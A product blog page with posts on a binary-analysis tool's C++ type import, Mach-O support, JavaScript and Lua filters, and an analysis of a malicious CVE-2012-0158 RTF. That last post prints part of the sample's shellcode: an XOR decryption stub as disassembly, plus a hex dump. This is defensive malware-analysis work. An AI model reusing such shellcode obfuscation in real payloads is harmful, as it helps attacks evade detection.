Cerbero Blog – Page 21

C++ Types: Under the Hood

In this post we’re going to explore the SDK part of the Profiler associated to imported structures and also all the C++ internals connected to the layout creation of structures/classes.

At first I thought about subdividing the material into several posts, but at the end it’s probably better to have it all together for future reference.

Layouts
Headers
Pointers
Endianness
Arrays
Sub-structures
Unions
Anonymous types
Bit-fields
Namespaces
Inheritance
VTables
Virtual Inheritance
Field alignment
Packing
Templates

Layouts

In the SDK a Layout is the class to be used when we need to create a graphical analysis of raw data. While we can create and handle headers from the UI, it is also possible to do it programmatically.

class LayoutInterval

    end
    start

class LayoutData

    arraySize() -> UInt32
    getColor() -> NTRgb
    getDescription() -> NTUTF8String
    getHeader() -> NTUTF8String
    getType() -> NTUTF8String
    setArraySize(UInt32 n)
    setColor(NTRgb rgba)
    setDescription(NTUTF8String const & description)
    setStruct(NTUTF8String const & hdr, NTUTF8String const & type)
    setTypeOptions(UInt32 opt)
    typeOptions() -> UInt32

class LayoutPair

    first
    second

class Layout

    add(MaxUInt offset, MaxUInt size, LayoutData data)
    add(LayoutInterval interval, LayoutData data)
    at(UInt32 i) -> LayoutPair
    at(LayoutPair const & lp) -> UInt32
    at(LayoutInterval interval) -> UInt32
    count() -> UInt32
    fromXml(NTUTF8String const & xstr) -> bool
    getMatches(MaxUInt offset, MaxUInt size) -> LayoutPairList
    getOverlappingWith(MaxUInt offset, MaxUInt size) -> LayoutPairList
    isModified() -> bool
    isNull() -> bool
    isValid() -> bool
    layoutName() -> NTString
    remove(MaxUInt offset, MaxUInt size)
    remove(LayoutInterval interval)
    renameLayout(NTString const & name) -> bool
    saveIfModified()
    setModified(bool b)
    toXml() -> NTUTF8String

Creating a layout is straightforward:

from Pro.Core import *

# create a new layout or retrieve an existing one from the project
layout = proCoreContext().getLayout("LAYOUT_NAME")
# create data
data = LayoutData()
data.setDescription("text")
data.setColor(ntRgba(0xFF, 0, 0, 0x70))
# add interval
layout.add(70, 30, data)

The data can be associated to a structure (or array of structures) as well. Please remember that the name of a header is always relative to header sub-directory of the user directory. Saving the layout is not necessary: it’s automatically saved in the project.

Attaching a layout to a hex view is also very easy:

from Pro.UI import *

hv = proContext().getCurrentView()
if hv.type() == ProView.Type_Hex:
    hv.setLayoutName("LAYOUT_NAME")

Of course, layouts can be used for operations not related to graphical analysis as well.

Headers

Headers are part of the CFF Core and as such the naming convention of the CFFHeader class isn’t camel-case.

class CFFHeaderAliasData

    category
    name
    type
    value
    vtype

class CFFHeaderStructData

    name
    schema
    type

class CFFHeaderTypeDefData

    name
    type

class CFFHeader

    AC_Define
    AC_Enum
    AC_Last
    AVT_Integer
    AVT_Last
    AVT_Real
    AVT_String

    BeginEdit()
    Close()
    EndEdit()
    Equals(CFFHeader s) -> bool
    static GetACName(int category) -> char const *
    static GetAVTName(int vtype) -> char const *
    GetAliasCount() -> UInt32
    GetAliasData(UInt32 i) -> CFFHeaderAliasData
    GetStructBaseData(UInt32 i) -> CFFHeaderStructData
    GetStructCount() -> UInt32
    GetStructData(UInt32 i) -> CFFHeaderStructData
    GetStructData(char const * name) -> CFFHeaderStructData
    GetTypeDefCount() -> UInt32
    GetTypeDefData(UInt32 i) -> CFFHeaderTypeDefData
    InsertAlias(char const * name, int category, char const * type, int vtype, char const * value)
    InsertStruct(char const * name, char const * type, char const * schema)
    InsertTypeDef(char const * name, char const * type)
    IsModified() -> bool
    IsNull() -> bool
    IsValid() -> bool
    LoadFromFile(NTString const & name) -> bool
    LoadFromXml(NTXml xml) -> bool
    LoadFromXml(NTUTF8String const & xml) -> bool
    SetModified(bool b)

A CFFHeader represents an abstract database in which structures/classes and other things are stored. While we won’t use most of its methods, some of them are very useful for common operations.

Let’s say we want to retrieve a specific structure from a header and use it.

from Pro.Core import *

def output(s):
    out = proTextStream()
    s.Dump(out)
    print(out.buffer)

obj = proCoreContext().currentScanProvider().getObject()
hdr = CFFHeader()
if hdr.LoadFromFile("WinNT"):
    s = obj.MakeStruct(hdr, "_IMAGE_DOS_HEADER", 0, CFFSO_Pack1)
    output(s)

The output of this snippet is:

e_magic   : 5A4D
e_cblp    : 0090
e_cp      : 0003
e_crlc    : 0000
e_cparhdr : 0004
e_minalloc: 0000
e_maxalloc: FFFF
e_ss      : 0000
e_sp      : 00B8
e_csum    : 0000
e_ip      : 0000
e_cs      : 0000
e_lfarlc  : 0040
e_ovno    : 0000
e_res.0   : 0000
e_res.1   : 0000
e_res.2   : 0000
e_res.3   : 0000
e_oemid   : 0000
e_oeminfo : 0000
e_res2.0  : 0000
e_res2.1  : 0000
e_res2.2  : 0000
e_res2.3  : 0000
e_res2.4  : 0000
e_res2.5  : 0000
e_res2.6  : 0000
e_res2.7  : 0000
e_res2.8  : 0000
e_res2.9  : 0000
e_lfanew  : 000000F8

We can specify the following options when retrieving a structure:

CFFSO_EndianDefault
CFFSO_EndianLittle
CFFSO_EndianBig
CFFSO_EndiannessDefault
CFFSO_EndiannessLittle
CFFSO_EndiannessBig

CFFSO_PointerDefault
CFFSO_Pointer16
CFFSO_Pointer32
CFFSO_Pointer64

CFFSO_PackNone
CFFSO_Pack1
CFFSO_Pack2
CFFSO_Pack4
CFFSO_Pack8
CFFSO_Pack16

CFFSO_NoCompiler
CFFSO_VC
CFFSO_GCC
CFFSO_Clang

These are the same options which are available from the UI when adding a structure to a layout.

When options are not specified, they default to the default structure options of the object. It’s possible to specify the default structure options with this method:

SetDefaultStructOptions(UInt32 options)

We’ll see later the implications of the various flags.

When I said that a CFFHeader represents an abstract database, I meant that it is not really bound to a specific format internally. All it cares about is that data is retrieved or set. The standard format used by headers is SQLite and you’ll need to use that format when creating layouts associated to structures. However, when using structures from Python it can be handy to avoid an associated header file. When the number of structures is very limited and you don’t need write or other complex operations, structures can be stored into an XML string. In fact, the internal format of structures is XML. Let’s take a look at one:

We can inspect the format of a structure stored in a header from the Header Manager in the Explore tab by double clicking on it. But we can also avoid creating a header altogether and output the schema of parsed structures directly when importing them from C++. Just check ‘Test mode’ and as ‘Output’ select ‘schemas’.

Let’s import a simple structure such as:

struct A
{
    int a;
};

The output will be:

To use this structure from Python we can write the following code:

schema = """



  



"""

hdr = CFFHeader()
if hdr.LoadFromXml(schema):
    s = obj.MakeStruct(hdr, "A", 0)
    output(s)

As you can see it’s very simple. I’ll use this method for the examples in the rest of the post, because they’re just examples and there’s no point in creating a header file for them.

Pointers

CFFSO_Pointer16
CFFSO_Pointer32
CFFSO_Pointer64

As a rule of thumb if a structure contains a pointer (or a vtable pointer) it is always a good idea to specify the desired size. When the size is omitted both in the explicit options and in the default structure options, the size will be set to the default pointer size of an object, which apart for PEObjects and MachObjects will always be 32bits.

Endianness

CFFSO_EndianLittle
CFFSO_EndianBig
# or
CFFSO_EndiannessLittle
CFFSO_EndiannessBig

When endianness is not specified it will be set to the default of the object. While internally it’s already possible to have individual fields with different endianness, an extra XML field attribute to specify it will be added in the future.

Arrays

The first thing to say is that there’s a difference between an array of top level structures and an array of fields. Creating a top level array of structures is easy:

s = obj.MakeStructArray(hdr, "A", 0, 10)

The support of arrays is somewhat limited. Multidimensional arrays are only partially supported, in the sense that they will be converted to a single dimension. For instance:

struct A
{
    int a[10][10];
};

Or in XML:

Will be convrted to:

a.0 : 00905A4D
a.1 : 00000003
a.2 : 00000004
a.3 : 0000FFFF
a.4 : 000000B8
a.5 : 00000000
a.6 : 00000040
a.7 : 00000000
a.8 : 00000000
a.9 : 00000000
a.10: 00000000
a.11: 00000000
a.12: 00000000

; etc.

Also notice that to access an array element in a CFFStruct the syntax to use is not “a[15]” but “a.15”, e.g.:

print(s.Str("a.15"))

Sub-structures

The only thing to mention about Sub-structures is that complex sub-types are always dumped separately, e.g.:

struct A
{
    int a;
    struct SUB
    {
        int sub;
    } b;
};

In XML:

In Python:

schema = """



  



  
  



"""
hdr = CFFHeader()
if hdr.LoadFromXml(schema):
    s = obj.MakeStruct(hdr, "A", 0)
    output(s)

The output:

a    : 00905A4D
b.sub: 00000003

Being a separate type, we can also use ‘A::Sub’ without its parent.

A new thing we’ve just seen is the presence of multiple structures in a single XML header. I’ve pasted the whole Python code once again just for clarity, in the next examples I won’t repeat it, since the Python code never changes, only the header string does.

Unions

Unions just like sub-structures are fully supported. The only thing to keep in mind is that when we have a top level union, meaning not contained in another structure, such as:

union A
{
    int a;
    short b;
};

Then to access its members it is necessary to add a ‘u.’ prefix. The reason for this is that CFFStructs support unions only as members, so the union above will result in a CFFStruct with a union member called ‘u’.

u.a: 00905A4D
u.b: 5A4D

Anonymous types

Anonymous types are only partially supported in the sense that they are given a name when imported. A type such as the following:

struct A
{
    union
    {
        int a;
        int b;
    } u;
};

Results in the following xml:

As you can see a ‘_Type_’ + number naming convention has been used to rename anonymous types. The first character (‘_’) in the name represents the default anonymous prefix. This prefix is customizable. If a typedef is found for an anonymous type, then the new name for that type will created by using the anonymous prefix + the typedef name.

Bit-fields

Bit-fields are fully supported.

struct A
{
    int a : 1;
    int b : 4;
};

Output:

a: 01
b: 06
 : 0482D2

The unnamed field at the end represents the unused bits given the field size, in this case we have an ‘int’ type and we’ve used only 5 bits of it.

There are significant differences in how compilers handle bit-fields. Visual C++ behaves differently than GCC/Clang. Some of the differences are summarized in this message by Richard W.M. Jones.

Another important difference I noticed is how bit fields are coalesced when the type changes, e.g.:

struct A
{
    int a : 1;
    short b : 1;
    int c : 1;
};

Without going now into how they are coalesced, the thing to remember is that the Profiler handles all these cases, but you need to specify the compiler to obtain the correct result.

Namespaces

Namespaces are fully supported.

namespace N
{

struct A
{
    int a;
};

}

Results in:

Moreover, just as in C++ we can use namespaces to encapsulate #include directives.

namespace N
{

#include 

}

This will cause all the types declared in ‘Something’ to be prefixed by the namespace (‘N::’). This can be very handy when we want to include types with the same name into the same header file.

Inheritance

Inheritance is fully supported.

struct A
{
    int a;
};

struct B : public A
{
    int b;
};

XML:

Output:

a: 00905A4D b: 00000003

Same with multiple inheritance:

Output:

a: 00905A4D b: 00000003 c: 00000004

VTables

The presence of virtual table pointers in structures which require them is fully supported. Let’s take for instance:

struct A { virtual void v() { } int a; };

XML:

Output:

__vtable_ptr_0: 00905A4D a : 00000003

Let’s see an example with multiple inheritance:

struct A { virtual void va() { } int a; }; struct B { virtual void vb() { } int b; }; struct C : public A, public B { int c; };

Output:

__vtable_ptr_0: 00905A4D __vtable_ptr_1: 00000003 a : 00000004 b : 0000FFFF c : 000000B8

When virtual tables are involved it is very important to specify the compiler, because things can vary a great deal between VC++ and GCC/Clang.

Virtual Inheritance

Virtual inheritance is fully supported. Virtual inheritance is a C++ feature to be used in scenarios which involve multiple inheritance with a common base class.

Let’s take the complex case of:

struct A { int a; virtual void va() {} }; struct B : public virtual A { virtual void vb() {} }; struct B2 { virtual void vb2() {} }; struct C : public virtual A, public B { int b; virtual void vc() {} }; struct TOP { int top; C c; virtual void vtop() {} };

Output (Visual C++):

__vtable_ptr_0 : 00905A4D top : 00000003 c.__vtable_ptr_0: 00000004 c.__vtable_ptr_1: 0000FFFF c.__vtable_ptr_2: 000000B8 c.b : 00000000 c.a : 00000040

Output (GCC):

__vtable_ptr_0 : 00905A4D top : 00000003 c.__vtable_ptr_0: 00000004 c.b : 0000FFFF c.a : 000000B8

As you can see the layout differs from Visual C++ to GCC. Another thing to notice is that members of virtual base classes are appended at the end. There’s a very good presentation by Igor Skochinsky on C++ decompilation you can watch for more information.

Field alignment

Field alignment is an important factor. Structures which are not subject to packing constraints are aligned up to their biggest native member. It’s more complex than this, because sub-structures influence parent structures but not vice versa. Suffice it to say that there are some internal gotchas, but the Profiler should handle all cases correctly.

Packing

CFFSO_Pack1 CFFSO_Pack2 CFFSO_Pack4 CFFSO_Pack8 CFFSO_Pack16

When a packing constraint is applied, fields are aligned to either the field size or the packing whichever is less. A packing constraint of 1 is essential if we want to read raw data without any kind of padding between fields. For instance, PE structures in WinNT.h are all pragma packed to 1, so we must specify the same packing when using them.

Templates

And for the end a little treat: C++ templates. Let’s take for instance:

template struct A { T a; }; template struct B { T b; };

XML:

We can specify template parameters following the C++ syntax:

s = obj.MakeStruct(hdr, "B>", 0)

Output:

b.a: 00905A4D

So, even nested templates are supported. 😉

C++ Types: Introduction

As announced previously, the upcoming 0.9.7 version of the Profiler represents a milestone in the development road map. We’re excited to present to you an awesome set of new features. In fact, the ground to cover is so vast that one post is not nearly enough. Throughout this week I’ll write some posts to cover the basics and this will allow for enough time to beta test the new version before reaching a release candidate.

Let’s start with an awesome image:

Does it look like a Clang based tool to parse C++ sources and extract type information? If yes, then that’s exactly it!

To sum it up very briefly, the Profiler is now able to extract C++ types such as classes and structures and use these types both in the UI and in Python.

Of course, there’s much more to it. The layout of C++ types is a complex matter and doesn’t just involve supporting simple data structures. This post is just an introduction, the next ones will focus on topics such as: endianness, pointers, arrays, sub-structures, unions, bit-fields, inheritance, virtual tables, virtual inheritance, anonymous types, alignment, packing and templates. Yes, you read correctly: templates. 🙂

And apart from the implications of C++ types themselves, there’s the SDK part of the Profiler which will also require some dedicated posts. In this introduction I’m going to show a very simple flow and one of the many possible use cases.

You probably have noticed that the code in the screenshot above belongs to WinNT.h. Let’s see how to import the types in this header quickly. Usually we could parse all the headers of a framework with a few clicks, but while Clang is ideal to parse both Linux and OS X sources, it has difficulty with some Visual C++ extensions which are completely invalid C++ code. So rather than importing the whole Windows SDK we just limit ourselves to a part of WinNT.h.

I have added some predefines for Windows types (we could also include WinDef.h):

#define BYTE unsigned char #define WORD unsigned short #define DWORD unsigned int #define __int64 long long #define LONG long #define CHAR char #define WCHAR short #define ULONGLONG unsigned long long #define UNALIGNED #define SHORT short #define NTAPI #define VOID void #define PVOID void * #define BOOL unsigned int #define BOOLEAN unsigned int

Then I just copied the header into the import tool. Usually this isn’t necessary, because we can set up the include directories from the UI and then just use #include directives, but since we need to modify the header to remove invalid C++ extensions, it makes sense to paste it.

The beginning of the code:

HEADER_START("WinNT"); typedef struct _GUID { unsigned long Data1; unsigned short Data2; unsigned short Data3; unsigned char Data4[ 8 ]; } GUID; typedef GUID CLSID; typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header WORD e_magic; // Magic number WORD e_cblp; // Bytes on last page of file WORD e_cp; // Pages in file WORD e_crlc; // Relocations WORD e_cparhdr; // Size of header in paragraphs WORD e_minalloc; // Minimum extra paragraphs needed WORD e_maxalloc; // Maximum extra paragraphs needed WORD e_ss; // Initial (relative) SS value WORD e_sp; // Initial SP value WORD e_csum; // Checksum WORD e_ip; // Initial IP value WORD e_cs; // Initial (relative) CS value WORD e_lfarlc; // File address of relocation table WORD e_ovno; // Overlay number WORD e_res[4]; // Reserved words WORD e_oemid; // OEM identifier (for e_oeminfo) WORD e_oeminfo; // OEM information; e_oemid specific WORD e_res2[10]; // Reserved words LONG e_lfanew; // File address of new exe header } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER; // etc. etc.

Did you notice the HEADER_START macro?

HEADER_START("WinNT");

This tells our parser that the C++ types following this directive will be dumped into the header “WinNT.cphdr”. This file is relative to the header directory, a sub-directory of the user data directory. A HEADER_END directive does also exist, it equals to invoking the start directive with an empty string. To give you a better idea how these directives work take a look at this snippet:

// the types in A.h won't be dumped to a header file #include HEADER_START("BC"); // the types of B.h and C.h will end up in BC.cphdr #include #include HEADER_END(); // what follows is not dumped to a header file

If you specify the “#” string in the start directive, the types which follow will be dumped to the ‘this’ header. This is a special header which lives in the current project, so that you can pass the Profiler project to a colleague and it will already contain the necessary types without having to send extra files.

Back to the importing process, we click on ‘Import’ and that’s it. If Clang encounters C++ errors, we can fix them thanks to the diagnostic information:

We can explore the created header file from the ‘Explore’ tab.

Now let’s use the header to analyze a PE file inside of a Zip archive.

Please notice that I’m adding the types with a packing of 1: PE structures are pragma packed to 1.

What you see applied to the hex view, is a layout. In a layout you can insert structures or intervals (a segment of data with a description and a color).

A layout can even be created programmatically and be attached to a hex view as we’ll see in some other post. The implementation of layouts in the Profiler is quite cool, because they are standalone objects. Layouts are not really bound to a hex view: a view just chooses to be attached to a layout. This means that you can share a single layout among different hex views and changes will reflect in all attached views.

And while I didn’t mention it, the table view below on the left is the layout inspector. Its purpose is to let you inspect the structures associated to a layout at a particular position. Since layouts allow for overlapping structures, the inspector shows all structures associated in the current range.

But what if you go somewhere else and return to the hex view? The layout will be gone. Of course, you could press Ctrl+Alt+L and re-attach the layout to the view. There are other two options: navigate back or create a bookmark!

The created bookmark when activated will jump to the right entry and associate the layout for us. Remember that changing the name of a layout invalidates the bookmark.

That’s all for now. And we’ve only scraped the surface… 🙂
Author Erik PistelliPosted on August 5, 2013April 1, 2021Categories Suite StandardTags C, Clang, Classes, GCC, Structs, Structures, VC, Visual C++Leave a comment on C++ Types: Introduction

Portable Application

This is a very small addition to the upcoming 0.9.7 version of the Profiler, but nonetheless it can be handy. There are occasions in which it is necessary to copy the Profiler from one Windows system to another. Currently this involves copying the user settings: the ones stored in AppData and those in the Windows registry. In this post we’ll see how to create a standalone version of the Profiler which leaves no stuff around in the system. Here’s how:

1 – Copy the directory of the Profiler from the installation path to a writable location.
2 – Create a sub-directory named “user”.
3 – Run the Profiler.

That’s it. Now all your settings will be stored under the user directory.

Remember to create your config files for extensions, actions, key providers, etc. under user/config/, as the config directory under the root one contains files which might be overwritten during an update.

Python can be stored as a sub-directory and its path, once set, will be automatically be recognized as a relative one.

During this month there won’t be many posts, a major update is under development and we hope it will be ready at the end of the month. Stay tuned as something extremely cool is coming. 😉
Author Erik PistelliPosted on July 13, 2013Categories Suite StandardTags Portable Application, Standalone2 Comments on Portable Application

News for version 0.9.6

The new 0.9.6 version of the Profiler is out. The main new feature is the support for Mach-O files. Since this feature stands on its own, it did make sense to postpone other features to the next version and in the meanwhile let our users benefit from this addition.

Here’s the changelist:

– added support for Mach-O files
– added support for fat/universal binaries
– added support for Apple code signatures
– exposed DemangleSymbolName to Python

The DemangleSymbolName function demangles both VC++ and GCC symbols. Its use is straightforward:

from Pro.Core import DemangleSymbolName demangled = DemangleSymbolName("__ZNK8OSObject14getRetainCountEv") print(demangled) # outputs: OSObject::getRetainCount() const
Author Erik PistelliPosted on June 27, 2013Categories Suite StandardTags NewsLeave a comment on News for version 0.9.6

Mach-O support (including Universal Binaries and Apple Code Signatures)

The reason behind this addition is that before undertaking the next big step in the road map of the Profiler there was some spare time to dedicate to some extra features for the upcoming 0.9.6 version. There have also been some customer requests for Mach-O support, so we hope that this will satisfy their request. While there are still some things left which would be useful and nice to add to the Mach-O support, they are not many.

The first screenshot as you can see features the Mach-O layout.

The logic of Mach-Os starts with their load commands which describe everything else:

Segments and sections:

Entry points (LC_MAIN, LC_UNIXTHREAD):

Symbols:

Then the LC_DYLD_INFO can describle some VM operations for rebasing and binding:

Binding:

Also the DyldInfo export section is represented as in the file as a tree:

Function starts:

Of course, Mach-O support makes little sense without Fat/Universal Binary support:

While the upcoming version won’t yet support validation of Apple Code Signatures embedded in Mach-Os, it’s already possible to inspect their format and the embedded certificates.

As usual all the formats added have been exposed to Python as well. I paste some of the SDK class documentation here excluding constants, which are just too many.

class MachObject : CFFObject AddressToOffset(MaxUInt address) -> MaxUInt AddressToSection(MaxUInt address) -> CFFStruct AddressToSegment(MaxUInt address) -> CFFStruct BuildSymbolsValueHash(CFFStruct symtablc) -> NTHash< MaxUInt,UInt32 > CertificateLCs() -> NTUIntVector DyLibModules(CFFStruct dysymtablc) -> CFFStruct DySymTableLC() -> CFFStruct DyTableOfContents(CFFStruct dysymtablc) -> CFFStruct DyldDisassembleBind(NTTextStream out, MaxUInt offset, UInt32 size) DyldDisassembleBind(NTTextStream out, CFFStruct dyldinfo) DyldDisassembleLazyBind(NTTextStream out, CFFStruct dyldinfo) DyldDisassembleRebase(NTTextStream out, MaxUInt offset, UInt32 size) DyldDisassembleRebase(NTTextStream out, CFFStruct dyldinfo) DyldDisassembleWeakBind(NTTextStream out, CFFStruct dyldinfo) DyldFindExportedSymbol(CFFStruct dyldinfo, char const * symbol) -> MaxUInt DyldInfoLC() -> CFFStruct EntryPointAddress(CFFStruct lc) -> MaxUInt EntryPointLCs() -> NTUIntVector ExternalSymbolReferences(CFFStruct dysymtablc) -> CFFStruct FunctionStartsLC() -> CFFStruct FunctionStartsOffsetsAndValues(CFFStruct funcstartslc, NTVector< MaxUInt > & values) -> NTUIntVector GetLC(LoadCmdInfo info) -> CFFStruct GetLC(UInt32 index) -> CFFStruct GetLCCount() -> UInt32 GetLCDescription(CFFStruct s) -> NTString GetLCDescription(UInt32 index) -> NTString GetLCInfo(UInt32 index) -> LoadCmdInfo GetLCInfoFromOffset(MaxUInt offset) -> LoadCmdInfo static GetLCName(UInt32 cmd) -> NTString IndirectSymbolTable(CFFStruct dysymtablc) -> CFFStruct IsMachO64() -> bool MachHeader() -> CFFStruct OffsetToAddress(MaxUInt offset) -> MaxUInt OffsetToSection(MaxUInt offset) -> CFFStruct OffsetToSegment(MaxUInt offset) -> CFFStruct ProcessLoadCommands() -> bool ReadSLEB128(NTBuffer b) -> Int64 ReadSLEB128(MaxUInt offset, UInt32 & size) -> Int64 ReadULEB128(NTBuffer b) -> UInt64 ReadULEB128(MaxUInt offset, UInt32 & size) -> UInt64 SectionFromOffset(UInt32 cmd, MaxUInt offset) -> CFFStruct SegmentSections(CFFStruct seg) -> CFFStruct SymTableLC() -> CFFStruct SymbolNList(CFFStruct symtablc) -> CFFStruct class FatObject : CFFObject Architectures() -> CFFStruct class AppleCodeSignatureObject : CFFObject BlobFromOffset(UInt32 offset) -> CFFStruct BlobIndexes(CFFStruct supblob) -> CFFStruct BlobName(UInt32 magic) -> NTString BlobName(CFFStruct blob) -> NTString IsSuperBlob(UInt32 magic) -> bool IsSuperBlob(CFFStruct blob) -> bool TopBlob() -> CFFStruct

Given the SDK capabilities, it’s easy to perform custom scans on Mach-Os or to create plugins.

That’s all. Hope you enjoyed and don’t be shy if you have feature requests or suggestions. 😉
Author Erik PistelliPosted on June 24, 2013April 1, 2021Categories Suite StandardTags Code Signature, Executable, Fat Binary, Mac OS X, OSX, Universal BinaryLeave a comment on Mach-O support (including Universal Binaries and Apple Code Signatures)

News for version 0.9.5

We’re happy to present to you the new version of the Profiler with the following news:

– introduced Lua filters: lua/custom and lua/loop
– added optional condition to misc/basic
– added JavaScript execute action
– added JavaScript debugger
– simplified save report/project logic
– included actions among the extensions views
– improved detection of shellcodes
– introduced max file size option for shellcode detection
– improved OLE Streams parsing and extraction from RTFs
– exposed getHash method in ScanProvider to Python
– added text replace functionality to text controls

While most of the items in the list have been discussed in previous posts, some of them need a brief introduction.

Max file size for shellcode detection

While shellcode detection applies by default to files of any size, you might want to specify a threshold.

This is useful if you want to speed up the analysis of large files. It might come handy in some cases.

The ‘getHash’ method

This method should be used by hooks to retrieve a hash for the currently scanned file. The syntax is very simple:

sp.getHash("md5")

Of course one could use a filter to hash the file, but the advantage of this method is that once a particular hash type has been computed it won’t be computed again if requested by another hook.

Improved OLE Streams parsing and extraction from RTFs

In one of the previous use cases we’ve analyzed a huge set of malicious RTF documents. Some of them were not recognized correctly and some of them showed problems in the automatic extraction of OLE streams. This release fixes these issues.

As you can see all RTFs are now correctly parsed and their OLE stream has been extracted. Some of the OLE objects though are not extracted correctly. After looking into it, it seems to be a problem with the malicious files themselves. OLE streams are encoded as hex strings into the RTF and in some of these files there’s an extra byte which invalidates the sequence.

01 05 00 00 02 00 00 00 1B 00 00 00 A 4D

That ‘A’ character between 00 and 4D makes the sequence to be 00 A4 D which is incorrect. Our guess is that the malware generator which produced these RTFs outputted some invalid ones by inserting an ‘A’ character instead of a 0x0A newline.

While RTF readers are not able to parse these objects either it’s still interesting for our analysis to be able to inspect them. So we just load the RTF files patching the ‘A’ character with a filter as in the screenshot below.

That fixes it and we are now able to inspect the embedded OLE object and its threats. As you can see we get directly the shellcode disassembly from the automatic analysis.

Enjoy!
Author Erik PistelliPosted on June 7, 2013April 1, 2021Categories Suite StandardTags News5 Comments on News for version 0.9.5

JavaScript Analysis

The upcoming 0.9.5 version of the Profiler introduces tools to interactively analyze JavaScript code. In a few words it adds the capability to execute snippets of code or to debug them. The JavaScript engine used is the one in WebKit.

Let’s take a look at the newly introduced actions:

The ‘Execute JavaScript‘ action executes a script and lets the user decided whether to process ‘eval‘ calls or not.

Even when ‘eval‘ calls are not being processed, the argument is still printed out for the user to inspect. And in case ‘eval‘s are performed, then the result (if any) is printed out as well.

js_eval: print('hello world'); 1 + 1 js_print: hello world js_eval_result: 2

Let’s take a look at the same code under the JavaScript debugger. Given the JavaScript debug capabilities already in Qt, it was easy to integrate a full fledged debugger:

The debugger can be executed as a stand-alone utility (jsdbg.exe) as well.

It shouldn’t take long before the new version is ready and then we’ll see these features in action against some real world samples. Stay tuned!
Author Erik PistelliPosted on June 3, 2013April 1, 2021Categories Suite StandardTags Debug, EcmaScript, Exec, JSLeave a comment on JavaScript Analysis

Custom filters: Lua and misc/basic

Last year filters have been introduced and among them them the very useful ‘misc/basic‘. The upcoming 0.9.5 version of the Profiler improves this filter introducing the condition parameter.

For instance, let’s take the following filter:

It xors every byte if different than 0xFF and 0. The ‘misc/basic‘ filter can be used to express even more complex operations such as:

In this case the the filter xors every third dword with 0xAABBCCDD, following the pattern ‘xor skip skip’, in little endian mode and only if the value is different than 0 and 0xAABBCCDD. While lots of operations can be expressed with this filter, there are limits.

This is why Lua filters have been introduced. Right now there are two such filters available: ‘lua/custom‘ and ‘lua/loop‘. Let’s start with the second one which is just a shortcut.

if e ~= 0 and e ~= 0xFF then e = bit.bxor(e, 0xFF) end

This script does the exact same thing as the first example of the ‘misc/basic‘ filter: it xors every byte if different than 0xFF and 0. In this specific case there’s no reason to use a Lua filter. In fact, Lua filters are considerably slower than native filters. Thus, they should be used only when the operation is too complex to be expressed with any of the default filters.

While ‘lua/loop‘ is inteded for simple loop operations, ‘lua/custom‘, as the name suggests, can be used to implement a custom filter logic. Here’s an example, which again does the same thing as the previous example:

function run(filter) local c = filter:container() local size = c:size() local offset = 0 local bsize = 16384 while size ~= 0 do if bsize > size then bsize = size end local block = c:read(offset, bsize) local boffs = 0 while boffs < bsize do local e = block:readU8(boffs) if e ~= 0 and e ~= 0xFF then e = bit.bxor(e, 0xFF) end block:writeU8(boffs, e) boffs = boffs + 1 end c:write(offset, block) offset = offset + bsize size = size - bsize end return Base.FilterErr_None end

The security of these scripting filters is very high. They run in a special sandboxed environment, have access only to a minimum set of secure functions, are limited in memory consumption (2 MBs by default, but it can be configured from the settings) and can be interrupted at any time by the user.

If you still don't wish to allow script filters, they can be disabled from the settings.

The Lua VM is almost vanilla, the only difference is that it allows for 64-bit numbers. As you can observe from the examples, the Lua library for bitwise operations has been renamed from 'bit32' to 'bit'.

We'll see some practical usage samples in the near future. Stay tuned!
Author Erik PistelliPosted on May 30, 2013April 1, 2021Categories Suite StandardTags Decryption, LuaLeave a comment on Custom filters: Lua and misc/basic

CVE-2012-0158: RTF/OLE/CFBF/PE

Since support for the RTF file format has been added very recently with the version 0.9.4 of the Profiler, it’s a good idea to test it against real malware. I downloaded a pack of RTFs from contagiodump.blogspot.com and as I promised in the last post chose a more recent vulnerability: CVE-2012-0158. The reason why I picked a certain RTF from the pack is because most of the RTFs were automatically recognized and analyzed by the Profiler, while the following sample offers us a chance for some nice interactive analysis.

The first problem as you can see from the screenshot is that the RTF is not being automatically identified as such. That is because the signature is incomplete: the last two letters are missing. The next version of the Profiler will improve the detection in this regard. However, we can easily load it as RTF ourselves.

The RTF contains a lot of foreign data (meaning data which is not part of the RTF itself). Looking at the pattern an educate guess would be that it’s an encrypted payload.

The OLE stream contained in the RTF is flagged as containing possible shellcode. The Profiler detects it correctly. However, it’s actually the object embedded in the OLE stream which contains the shellcode. But wait, there’s no embedded object visible. This is because the extraction of the object failed, since the format of the OLE stream (which is undocumented) is different than usual. This is not a problem, we can just as easily load the object ourselves as the signature is easily recognizable.

This last step was not strictly necessary, since we had already a detected shellcode in the OLE stream, but it increases the completeness of the analysis.

Since this is the header of the OLE stream:

Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F Ascii 00000000 01 05 00 00 02 00 00 00 1B 00 00 00 4D 53 43 6F ............MSCo 00000010 6D 63 74 6C 4C 69 62 2E 4C 69 73 74 56 69 65 77 mctlLib.ListView 00000020 43 74 72 6C Ctrl

Another educated guess would be that this is the component affected by the vulnerability. Let’s go back to the detected shellcode.

The initial instructions make sense and the following ones not. Let’s take a closer look.

00000920: nop 00000921: nop 00000922: nop 00000923: nop 00000924: jmp 0x936 00000926: pop edx 00000927: dec edx 00000928: xor ecx, ecx 0000092A: mov cx, 0x2da 0000092E: xor byte ptr [edx+ecx*1], 0xee 00000932: loop 0x92e 00000934: jmp 0x93b 00000936: call 0x926

This portion of code is easily recognizable as being a decryption loop for the code that follows. This is usually implemented to avoid detection. Didn’t work this time.

Let’s select the encrypted shellcode.

And decrypt it with the xor filter. We can confirm the correctness of the decryption by adding the ‘disasm/x86‘ filter.

Back to the decrypted bytes, we use the script presented in the previous post to create an executable from the shellcode.

A quick analysis with the help of the debugger.

